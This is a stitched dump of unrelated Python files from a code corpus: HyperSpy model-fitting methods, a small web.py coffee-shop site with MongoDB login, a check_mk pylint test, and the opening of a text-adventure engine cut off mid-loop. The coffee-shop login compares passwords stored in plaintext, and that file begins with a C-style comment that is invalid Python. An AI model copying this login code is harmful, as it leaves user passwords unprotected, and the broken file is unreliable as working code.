pname = param.name.lower().replace(' ', '_')
kwds['%s_%s.%s' % (i, cname, pname)] = param.map
i += 1
np.savez(filename, **kwds)
def load_parameters_from_file(self, filename):
"""Loads the parameters array from a binary file written with the
'save_parameters2file' function.
Parameters
        ----------
filename : str
See Also
--------
save_parameters2file, export_results
Notes
-----
In combination with `save_parameters2file`, this method can be used to
recreate a model stored in a file. Actually, before HyperSpy 0.8 this
        was the only way to do so. However, this is known to be brittle. For
example see https://github.com/hyperspy/hyperspy/issues/341.
"""
f = np.load(filename)
i = 0
for component in self: # Cut the parameters list
cname = component.name.lower().replace(' ', '_')
for param in component.parameters:
pname = param.name.lower().replace(' ', '_')
param.map = f['%s_%s.%s' % (i, cname, pname)]
i += 1
self.fetch_stored_values()
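    # Round-trip sketch (the file name is an assumption): store the fitted
    # parameter maps and restore them later to recreate the model state:
    #   m.save_parameters2file("fit_results")           # writes fit_results.npz
    #   m.load_parameters_from_file("fit_results.npz")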
def plot(self, plot_components=False):
"""Plots the current spectrum to the screen and a map with a
cursor to explore the SI.
Parameters
----------
plot_components : bool
If True, add a line per component to the signal figure.
"""
# If new coordinates are assigned
self.spectrum.plot()
_plot = self.spectrum._plot
l1 = _plot.signal_plot.ax_lines[0]
color = l1.line.get_color()
l1.set_line_properties(color=color, type='scatter')
l2 = hyperspy.drawing.spectrum.SpectrumLine()
l2.data_function = self._model2plot
l2.set_line_properties(color='blue', type='line')
# Add the line to the figure
_plot.signal_plot.add_line(l2)
l2.plot()
on_figure_window_close(_plot.signal_plot.figure,
self._close_plot)
self._model_line = l2
self._plot = self.spectrum._plot
self._connect_parameters2update_plot()
if plot_components is True:
self.enable_plot_components()
def _connect_component_line(self, component):
if hasattr(component, "_model_plot_line"):
component.connect(component._model_plot_line.update)
for parameter in component.parameters:
parameter.connect(component._model_plot_line.update)
def _disconnect_component_line(self, component):
if hasattr(component, "_model_plot_line"):
component.disconnect(component._model_plot_line.update)
for parameter in component.parameters:
parameter.disconnect(component._model_plot_line.update)
def _connect_component_lines(self):
for component in [component for component in self if
component.active]:
self._connect_component_line(component)
def _disconnect_component_lines(self):
for component in [component for component in self if
component.active]:
self._disconnect_component_line(component)
def _plot_component(self, component):
line = hyperspy.drawing.spectrum.SpectrumLine()
line.data_function = component._component2plot
# Add the line to the figure
self._plot.signal_plot.add_line(line)
line.plot()
component._model_plot_line = line
self._connect_component_line(component)
def _update_component_line(self, component):
if hasattr(component, "_model_plot_line"):
component._model_plot_line.update()
def _disable_plot_component(self, component):
self._disconnect_component_line(component)
if hasattr(component, "_model_plot_line"):
component._model_plot_line.close()
del component._model_plot_line
self._plot_components = False
def _close_plot(self):
if self._plot_components is True:
self.disable_plot_components()
self._disconnect_parameters2update_plot()
self._model_line = None
def enable_plot_components(self):
if self._plot is None or self._plot_components:
return
self._plot_components = True
for component in [component for component in self if
component.active]:
self._plot_component(component)
def disable_plot_components(self):
if self._plot is None:
return
for component in self:
self._disable_plot_component(component)
self._plot_components = False
def assign_current_values_to_all(self, components_list=None, mask=None):
"""Set parameter values for all positions to the current ones.
Parameters
----------
component_list : list of components, optional
If a list of components is given, the operation will be performed
only in the value of the parameters of the given components.
The components can be specified by name, index or themselves.
mask : boolean numpy array or None, optional
The operation won't be performed where mask is True.
"""
if components_list is None:
components_list = []
for comp in self:
if comp.active:
components_list.append(comp)
else:
components_list = [self._get_component(x) for x in components_list]
for comp in components_list:
for parameter in comp.parameters:
parameter.assign_current_value_to_all(mask=mask)
def _enable_ext_bounding(self, components=None):
"""
"""
if components is None:
components = self
for component in components:
for parameter in component.parameters:
parameter.ext_bounded = True
def _disable_ext_bounding(self, components=None):
"""
"""
if components is None:
components = self
for component in components:
for parameter in component.parameters:
parameter.ext_bounded = False
def export_results(self, folder=None, format=None, save_std=False,
only_free=True, only_active=True):
"""Export the results of the parameters of the model to the desired
folder.
Parameters
----------
folder : str or None
The path to the folder where the file will be saved. If `None` the
current folder is used by default.
format : str
The format to which the data will be exported. It must be the
extension of any format supported by HyperSpy. If None, the default
format for exporting as defined in the `Preferences` will be used.
save_std : bool
If True, also the standard deviation will be saved.
only_free : bool
If True, only the value of the parameters that are free will be
exported.
only_active : bool
If True, only the value of the active parameters will be exported.
Notes
-----
        The name of the files will be determined by the name attributes of each
        Component and Parameter. Therefore, it is possible to customise the file
        names by modifying the name attributes.
"""
for component in self:
if only_active is False or component.active:
component.export(folder=folder, format=format,
save_std=save_std, only_free=only_free)
def plot_results(self, only_free=True, only_active=True):
"""Plot the value of the parameters of the model
Parameters
----------
only_free : bool
If True, only the value of the parameters that are free will be
plotted.
only_active : bool
If True, only the value of the active parameters will be plotted.
Notes
-----
        The name of the files will be determined by the name attributes of each
        Component and Parameter. Therefore, it is possible to customise the file
        names by modifying the name attributes.
"""
for component in self:
if only_active is False or component.active:
component.plot(only_free=only_free)
def print_current_values(self, only_free=True):
"""Print the value of each parameter of the model.
Parameters
----------
only_free : bool
If True, only the value of the parameters that are free will
be printed.
"""
print "Components\tParameter\tValue"
for component in self:
if component.active:
if component.name:
print(component.name)
else:
print(component._id_name)
parameters = component.free_parameters if only_free \
else component.parameters
for parameter in parameters:
if not hasattr(parameter.value, '__iter__'):
print("\t\t%s\t%g" % (
parameter.name, parameter.value))
def enable_adjust_position(
self, components=None, fix_them=True, show_label=True):
"""Allow changing the *x* position of component by dragging
a vertical line that is plotted in the signal model figure
Parameters
----------
components : {None, list of components}
If None, the position of all the active components of the
model that has a well defined *x* position with a value
in the axis range will get a position adjustment line.
Otherwise the feature is added only to the given components.
The components can be specified by name, index or themselves.
fix_them : bool
If True the position parameter of the components will be
            temporarily fixed until adjust position is disabled. This can
be useful to iteratively adjust the component positions and
fit the model.
show_label : bool, optional
If True, a label showing the component name is added to the
plot next to the vertical line.
See also
--------
disable_adjust_position
"""
if (self._plot is None or
self._plot.is_active() is False):
self.plot()
if self._position_widgets:
self.disable_adjust_position()
on_figure_window_close(self._plot.signal_plot.figure,
self.disable_adjust_position)
if components:
components = [self._get_component(x) for x in components]
else:
self._adjust_position_all = (fix_them, show_label)
components = components if components else self
if not components:
# The model does not have components so we do nothing
return
components = [
component for component in components if component.active]
for component in components:
self._make_position_adjuster(component, fix_them, show_label)
def _make_position_adjuster(self, component, fix_it, show_label):
if (component._position is not None and
not component._position.twin):
set_value = component._position._set_value
get_value = component._position._get_value
else:
return
# Create an AxesManager for the widget
axis_dict = self.axes_manager.signal_axes[0].get_axis_dictionary()
am = AxesManager([axis_dict, ])
am._axes[0].navigate = True
try:
am._axes[0].value = get_value()
except TraitError:
# The value is outside of the axis range
return
# Create the vertical line and labels
if show_label:
self._position_widgets.extend((
DraggableVerticalLine(am),
DraggableLabel(am),))
# Store the component for bookkeeping, and to reset
# its twin when disabling adjust position
self._position_widgets[-2].component = component
self._position_widgets[-1].component = component
w = self._position_widgets[-1]
w.string = component._get_short_description().replace(
' component', '')
w.set_mpl_ax(self._plot.signal_plot.ax)
self._position_widgets[-2].set_mpl_ax(
self._plot.signal_plot.ax)
else:
self._position_widgets.extend((
DraggableVerticalLine(am),))
# Store the component for bookkeeping, and to reset
# its twin when disabling adjust position
self._position_widgets[-1].component = component
self._position_widgets[-1].set_mpl_ax(
self._plot.signal_plot.ax)
# Create widget -> parameter connection
am._axes[0].continuous_value = True
am._axes[0].on_trait_change(set_value, 'value')
# Create parameter -> widget connection
# This is done with a duck typing trick
# We disguise the AxesManager axis of Parameter by adding
# the _twin attribute
am._axes[0]._twins = set()
component._position.twin = am._axes[0]
def disable_adjust_position(self):
"""Disables the interactive adjust position feature
See also
--------
enable_adjust_position
"""
self._adjust_position_all = False
while self._position_widgets:
pw = self._position_widgets.pop()
if hasattr(pw, 'component'):
pw.component._position.twin = None
del pw.component
pw.close()
del pw
def fit_component(
self,
component,
signal_range="interactive",
estimate_parameters=True,
fit_independent=False,
**kwargs):
"""Fit just the given component in the given signal range.
This method is useful to obtain starting parameters for the
components. Any keyword arguments are passed to the fit method.
Parameters
----------
component : component instance
The component must be in the model, otherwise an exception
is raised. The component can be specified by name, index or itself.
signal_range : {'interactive', (left_value, right_value), None}
If 'interactive' the signal range is selected using the span
selector on the spectrum plot. The signal range can also
be manually specified by passing a tuple of floats. If None
the current signal range is used.
estimate_parameters : bool, default True
If True will check if the component has an
estimate_parameters function, and use it to estimate the
parameters in the component.
fit_independent : bool, default False
If True, all other components are disabled. If False, all other
            component parameters are fixed.
Examples
--------
        Signal range set interactively
>>> g1 = components.Gaussian()
>>> m.append(g1)
>>> m.fit_component(g1)
Signal range set through direct input
>>> m.fit_component(g1, signal_range=(50,100))
"""
component = self._get_component(component)
cf = ComponentFit(self, component, signal_range,
estimate_parameters, fit_independent, **kwargs)
if signal_range == "interactive":
cf.edit_traits()
else:
cf.apply()
def set_parameters_not_free(self, component_list=None,
parameter_name_list=None):
"""
Sets the parameters in a component in a model to not free.
Parameters
----------
component_list : None, or list of hyperspy components, optional
If None, will apply the function to all components in the model.
If list of components, will apply the functions to the components
in the list. The components can be specified by name, index or
themselves.
parameter_name_list : None or list of strings, optional
If None, will set all the parameters to not free.
If list of strings, will set all the parameters with the same name
as the strings in parameter_name_list to not free.
Examples
--------
>>> v1 = components.Voigt()
>>> m.append(v1)
>>> m.set_parameters_not_free()
>>> m.set_parameters_not_free(component_list=[v1],
parameter_name_list=['area','centre'])
See also
--------
set_parameters_free
hyperspy.component.Component.set_parameters_free
hyperspy.component.Component.set_parameters_not_free
"""
if not component_list:
component_list = []
for _component in self:
component_list.append(_component)
else:
component_list = [self._get_component(x) for x in component_list]
for _component in component_list:
_component.set_parameters_not_free(parameter_name_list)
def set_parameters_free(self, component_list=None,
parameter_name_list=None):
"""
Sets the parameters in a component in a model to free.
Parameters
----------
component_list : None, or list of hyperspy components, optional
If None, will apply the function to all components in the model.
If list of components, will apply the functions to the components
in the list. The components can be specified by name, index or
themselves.
parameter_name_list : None or list of strings, optional
            If None, will set all the parameters to free.
            If list of strings, will set all the parameters with the same name
            as the strings in parameter_name_list to free.
Examples
--------
>>> v1 = components.Voigt()
>>> m.append(v1)
>>> m.set_parameters_free()
>>> m.set_parameters_free(component_list=[v1],
parameter_name_list=['area','centre'])
See also
--------
set_parameters_not_free
hyperspy.component.Component.set_parameters_free
hyperspy.component.Component.set_parameters_not_free
"""
if not component_list:
component_list = []
for _component in self:
component_list.append(_component)
else:
component_list = [self._get_component(x) for x in component_list]
for _component in component_list:
_component.set_parameters_free(parameter_name_list)
def set_parameters_value(
self,
parameter_name,
value,
component_list=None,
only_current=False):
"""
Sets the value of a parameter in components in a model to a specified
value
Parameters
----------
parameter_name : string
            Name of the parameter whose value will be changed
value : number
The new value of the parameter
component_list : list of hyperspy components, optional
            A list of components whose parameters will be changed. The components
can be specified by name, index or themselves.
only_current : bool, default False
If True, will only change the parameter value at the current
position in the model.
If False, will change the parameter value for all the positions.
Examples
--------
>>> v1 = components.Voigt()
>>> v2 = components.Voigt()
>>> m.extend([v1,v2])
>>> m.set_parameters_value('area', 5)
>>> m.set_parameters_value('area', 5, component_list=[v1])
>>> m.set_parameters_value('area', 5, component_list=[v1],
only_current=True)
"""
if not component_list:
component_list = []
for _component in self:
component_list.append(_component)
else:
component_list = [self._get_component(x) for x in component_list]
for _component in component_list:
for _parameter in _component.parameters:
if _parameter.name == parameter_name:
if only_current:
_parameter.value = value
_parameter.store_current_value_in_array()
else:
_parameter.value = value
_parameter.assign_current_value_to_all()
def set_component_active_value(
self, value, component_list=None, only_current=False):
"""
Sets the component 'active' parameter to a specified value
Parameters
----------
value : bool
The new value of the 'active' parameter
component_list : list of hyperspy components, optional
            A list of components whose parameters will be changed. The components
can be specified by name, index or themselves.
only_current : bool, default False
If True, will only change the parameter value at the current
position in the model.
If False, will change the parameter value for all the positions.
Examples
--------
>>> v1 = components.Voigt()
>>> v2 = components.Voigt()
>>> m.extend([v1,v2])
>>> m.set_component_active_value(False)
>>> m.set_component_active_value(True, component_list=[v1])
>>> m.set_component_active_value(False, component_list=[v1],
only_current=True)
"""
if not component_list:
component_list = []
for _component in self:
component_list.append(_component)
else:
component_list = [self._get_component(x) for x in component_list]
for _component in component_list:
_component.active = value
if _component.active_is_multidimensional:
if only_current:
                    _component._active_array[
                        self.axes_manager.indices[::-1]] = value
else:
_component._active_array.fill(value)
def __getitem__(self, value):
"""x.__getitem__(y) <==> x[y]"""
if isinstance(value, basestring):
component_list = []
for component in self:
if component.name:
if component.name == value:
component_list.append(component)
elif component._id_name == value:
component_list.append(component)
if component_list:
if len(component_list) == 1:
return(component_list[0])
else:
raise ValueError(
"There are several components with "
"the name \"" + str(value) + "\"")
else:
raise ValueError(
"Component name \"" + str(value) +
"\" not found in model")
else:
return list.__getitem__(self, value)
| gpl-3.0 | -5,660,573,258,302,874,000 | 37.328125 | 79 | 0.546257 | false |
torresj/practica-3 | Código/tiposCafes.py | 1 | 18836 | /*
Esta archivo pertenece a la aplicación "practica 3" bajo licencia GPLv2.
Copyright (C) 2014 Jaime Torres Benavente.
Este programa es software libre. Puede redistribuirlo y/o modificarlo bajo los términos
de la Licencia Pública General de GNU según es publicada por la Free Software Foundation,
bien de la versión 2 de dicha Licencia o bien (según su elección) de cualquier versión
posterior.
Este programa se distribuye con la esperanza de que sea útil, pero SIN NINGUNA GARANTÍA,
incluso sin la garantía MERCANTIL implícita o sin garantizar la CONVENIENCIA PARA UN
PROPÓSITO PARTICULAR. Véase la Licencia Pública General de GNU para más detalles.
Debería haber recibido una copia de la Licencia Pública General junto con este programa.
Si no ha sido así, escriba a la Free Software Foundation, Inc., en 675 Mass Ave, Cambridge,
MA 02139, EEUU.
*/
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 30 12:07:52 2013
@author: jaime
"""
import web
from web.contrib.template import render_mako
from web import form
import pymongo
import feedparser
import time
render = render_mako(
directories=['plantillas'],
input_encoding='utf-8',
output_encoding='utf-8',
)
'''
This function updates the timestamp of the last RSS access when
needed. It checks whether more than 10 minutes have passed since
the last access and, if so, downloads the RSS feed again.
'''
def actualiza_tiempo():
    global rss
    conn=pymongo.MongoClient()
    db=conn.mydb
    cache=db.cache
    tiempo1=time.time()
    t=cache.find_one({"rss":"el pais"})
    tiempo2=t[u'ult_act']
    # Re-download the feed only if more than 10 minutes have passed
    # since the last recorded access.
    if (tiempo1-tiempo2)>600:
        cache.update({"rss": "el pais"}, {"$set": {"ult_act": time.time()}})
        rss=feedparser.parse('http://ep00.epimg.net/rss/tags/ultimas_noticias.xml')
    conn.close()
# RSS variable; we also store the moment the feed was downloaded
rss=feedparser.parse('http://ep00.epimg.net/rss/tags/ultimas_noticias.xml')
actualiza_tiempo()
# Validators
vpass=form.regexp(r'.{7,20}$',"La contrasenia debe tener mas de 7 caracteres")
# Login form
formul = form.Form(
form.Textbox("user",form.notnull,description = "Usuario:"),
form.Password("password",form.notnull,vpass,description = "Contraseña:"),
form.Button("Login")
)
# Classes that handle the pages for each coffee type
class Cafe1:
def GET(self):
s=web.ctx.session
try:
if s.usuario!='':
log=True
user=s.usuario
else:
log=False
user=''
except AttributeError:
s.usuario=''
log=False
user=''
        # Variables used to fill in the web page
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 1"
cuerpo="Descripcion detallada del cafe 1"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
modo="index"
error=''
actualiza_tiempo()
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
def POST(self):
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 1"
cuerpo="Descripcion del cafe 1"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
if not login.validates():
log=False
user=''
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
else:
s=web.ctx.session
            # look up the user in the database
conn=pymongo.MongoClient()
db=conn.mydb
usuarios=db.usuarios
us=usuarios.find_one({"user":login['user'].value})
conn.close()
try:
if login['password'].value==us[u'pass']:
log=True
user=login['user'].value
s.usuario=user
else:
log=False
user=''
                error='contraseña errónea'
except TypeError:
log=False;
user=''
error='El usuario no existe'
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
class Cafe2:
def GET(self):
s=web.ctx.session
try:
if s.usuario!='':
log=True
user=s.usuario
else:
log=False
user=''
except AttributeError:
s.usuario=''
log=False
user=''
        # Variables used to fill in the web page
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 2"
cuerpo="Descripcion detallada del cafe 2"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
actualiza_tiempo()
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
def POST(self):
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 2"
cuerpo="Descripcion del cafe 2"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
if not login.validates():
log=False
user=''
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
else:
s=web.ctx.session
            # look up the user in the database
conn=pymongo.MongoClient()
db=conn.mydb
usuarios=db.usuarios
us=usuarios.find_one({"user":login['user'].value})
conn.close()
try:
if login['password'].value==us[u'pass']:
log=True
user=login['user'].value
s.usuario=user
else:
log=False
user=''
                error='contraseña errónea'
except TypeError:
log=False;
user=''
error='El usuario no existe'
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
class Cafe3:
def GET(self):
s=web.ctx.session
try:
if s.usuario!='':
log=True
user=s.usuario
else:
log=False
user=''
except AttributeError:
s.usuario=''
log=False
user=''
        # Variables used to fill in the web page
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 1"
cuerpo="Descripcion detallada del cafe 3"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
actualiza_tiempo()
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
def POST(self):
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 3"
cuerpo="Descripcion del cafe 3"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
if not login.validates():
log=False
user=''
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
else:
s=web.ctx.session
            # look up the user in the database
conn=pymongo.MongoClient()
db=conn.mydb
usuarios=db.usuarios
us=usuarios.find_one({"user":login['user'].value})
conn.close()
try:
if login['password'].value==us[u'pass']:
log=True
user=login['user'].value
s.usuario=user
else:
log=False
user=''
                error='contraseña errónea'
except TypeError:
log=False;
user=''
error='El usuario no existe'
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
class Cafe4:
def GET(self):
s=web.ctx.session
try:
if s.usuario!='':
log=True
user=s.usuario
else:
log=False
user=''
except AttributeError:
s.usuario=''
log=False
user=''
        # Variables used to fill in the web page
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 4"
cuerpo="Descripcion detallada del cafe 4"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
actualiza_tiempo()
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
def POST(self):
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 4"
cuerpo="Descripcion del cafe 4"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
if not login.validates():
log=False
user=''
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
else:
s=web.ctx.session
            # look up the user in the database
conn=pymongo.MongoClient()
db=conn.mydb
usuarios=db.usuarios
us=usuarios.find_one({"user":login['user'].value})
conn.close()
try:
if login['password'].value==us[u'pass']:
log=True
user=login['user'].value
s.usuario=user
else:
log=False
user=''
                error='contraseña errónea'
except TypeError:
log=False;
user=''
error='El usuario no existe'
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
| gpl-2.0 | -8,106,485,634,979,966,000 | 29.345161 | 155 | 0.523015 | false |
huiyiqun/check_mk | tests/pylint/test_pylint_inventory_plugins.py | 1 | 1622 | #!/usr/bin/python
# encoding: utf-8
import os
import sys
from testlib import repo_path
import testlib.pylint_cmk as pylint_cmk
def test_pylint_inventory_plugins(pylint_test_dir):
f = file(pylint_test_dir + "/cmk-inventory-plugins.py", "w")
# Fake data structures where checks register (See cmk_base/checks.py)
f.write("""
check_info = {}
check_includes = {}
precompile_params = {}
check_default_levels = {}
factory_settings = {}
check_config_variables = []
snmp_info = {}
snmp_scan_functions = {}
active_check_info = {}
special_agent_info = {}
inv_info = {} # Inventory plugins
inv_export = {} # Inventory export hooks
def inv_tree_list(path):
return inv_tree(path, [])
def inv_tree(path, default_value=None):
if default_value != None:
node = default_value
else:
node = {}
return node
""")
# add the modules
pylint_cmk.add_file(f, repo_path() + "/cmk_base/check_api.py")
    # add the inventory plugins module
pylint_cmk.add_file(f, repo_path() + "/cmk_base/inventory_plugins.py")
# Now add the checks
for path in pylint_cmk.check_files(repo_path() + "/checks"):
pylint_cmk.add_file(f, path)
# Now add the inventory plugins
for path in pylint_cmk.check_files(repo_path() + "/inventory"):
pylint_cmk.add_file(f, path)
f.close()
exit_code = pylint_cmk.run_pylint(pylint_test_dir)
assert exit_code == 0, "PyLint found an error in inventory plugins"
| gpl-2.0 | -9,162,550,503,937,921,000 | 27.45614 | 74 | 0.580148 | false |
sleepinghungry/wwif | basic_game/basic_game_engine.py | 1 | 5705 | from basic_game.descriptors import Descriptor
from basic_game.directions import directions
from basic_game.language import list_prefix, normalize_input, get_noun, prepositions
from basic_game.objects import Container
from basic_game.writer import DEBUG, ConsoleWriter
from basic_game.verbs import BaseVerb
class BasicGameEngine(object):
"""Given a completed GameWorld, starts a game."""
def __init__(self, basic_game_world):
self.writer = ConsoleWriter()
self.descriptor = Descriptor(self.writer)
self.game = basic_game_world
self.player = basic_game_world.player
self.animals = basic_game_world.animals
self.done = False
self.turn_count = 0
self.points = 0
basic_game_world.writer = self.writer
basic_game_world.engine = self
def run(self):
"""Run the main loop until game is done.
"""
while not self.done:
self._describe_setting()
if self.player.location.game_end:
if self.player.location.game_end.check(self.game, self.player.location):
self.writer.output(self.player.location.game_end.text)
break
if self.player.game_end:
if self.player.game_end.check(self.game, self.player):
self.writer.output(self.player.game_end.text)
break
if self.player.health < 0:
self.writer.output("Better luck next time!")
break
command = self._get_input()
if command == 'q' or command == 'quit':
break
self._do_action(command)
self.writer.output("\ngoodbye!\n")
def _describe_setting(self):
"""Describe the new setting and actors that the player has encountered.
"""
actor = self.player
# if the actor moved, describe the room
if actor.check_if_moved():
self.descriptor.output_title(actor.location)
self.descriptor.output_stats(self.turn_count, self.points)
self.descriptor.output_location_description(actor.location)
# See if the animals want to do anything
for animal in self.animals.values():
# first check that it is not dead
if animal.health >= 0:
animal.act_autonomously(actor.location)
def _get_input(self):
""" Request and parse out player input."""
self.writer.clear_text()
self.writer.output("")
user_input = input("> ")
    # remove punctuation and unnecessary words
command = normalize_input(user_input)
return command
def _do_action(self, command):
actor = self.player
words = command.split()
if not words:
return
# following the Infocom convention commands are decomposed into
# VERB(verb), OBJECT(noun), INDIRECT_OBJECT(indirect).
# For example: "hit zombie with hammer" = HIT(verb) ZOMBIE(noun) WITH HAMMER(indirect).
things = list(actor.inventory.values()) + \
list(actor.location.contents.values()) + \
list(actor.location.exits.values()) + \
list(actor.location.actors.values()) + \
[actor.location] + \
[actor]
for c in actor.location.contents.values():
if isinstance(c, Container) and c.is_open:
things += c.contents.values()
potential_verbs = []
for t in things:
